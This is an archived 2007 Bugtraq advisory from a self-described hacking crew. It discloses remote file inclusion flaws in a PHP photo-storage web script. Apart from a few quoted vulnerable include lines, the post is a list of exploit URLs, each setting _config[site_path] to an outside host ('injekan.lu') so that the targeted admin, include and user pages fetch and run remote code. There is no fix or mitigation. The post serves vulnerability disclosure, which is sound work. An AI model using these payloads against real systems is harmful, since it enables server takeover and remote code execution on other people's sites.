lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070108225553.16605.qmail@securityfocus.com>
Date: 8 Jan 2007 22:55:53 -0000
From: emel_gw_ini@...oo.com
To: bugtraq@...urityfocus.com
Subject: magic photo storage website Multiple Remote File Inclusion

============================ HItamputih Crew ====================
# hitamputih Advisory
# Discovered By : IbnuSina
#-----------------------------------------------------------
# Software: createauction
# Script : http://www.scriptaty.net/magic-photo-storage-website.html
# Method: file inclusion
# Thanks To : akukasih,nyubi,irvian,BlueSpy and all #hitamputih crew

[[SQL]]]---------------------------------------------------------
on dir admin

require_once '../include/config.php';
require_once $_config['site_path'] . '/include/admin_function.php';

exploit :
http://target.lu/path/admin/admin_password.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/add_welcome_text.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/admin_email.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/add_templates.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/admin_paypal_email.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/approve_member.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/delete_member.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/index.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/list_members.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/membership_pricing.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/send_email.php?_config[site_path]=http://injekan.lu?

on dir include
file config.php

require_once $_config['site_path'] . '/include/db_config.php'

exploit :

http://target.lu/path/include/config.php?_config[site_path]=http://injekan.lu?

file db_config.php


require_once $_config['site_path'] . '/class/mysql.class.php';

exploit :
http://target.lu/path/include/db_config.php?_config[site_path]=http://injekan.lu?

on file common_function.php

require_once $_config['site_path'] . '/class/session.class.php';
require_once $_config['site_path'] . '/class/validator.class.php';
require_once $_config['site_path'] . '/include/message.php';

http://target.lu/path/include/common_function.php?_config[site_path]=http://injekan.lu?

on dir user

require_once '../include/config.php';
require_once $_config['site_path'] . '/include/user_function.php';

exploit :

http://target.lu/path/user/add_category.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/add_news.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/change_catalog_template.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/couple_milestone.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/couple_profile.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/delete_category.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/index.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/login.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/logout.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/register.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/upload_photo.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/user_catelog_password.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/user_email.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/user_extend.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/user_membership_password.php?_config[site_path]=http://injekan.lu?

##############################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ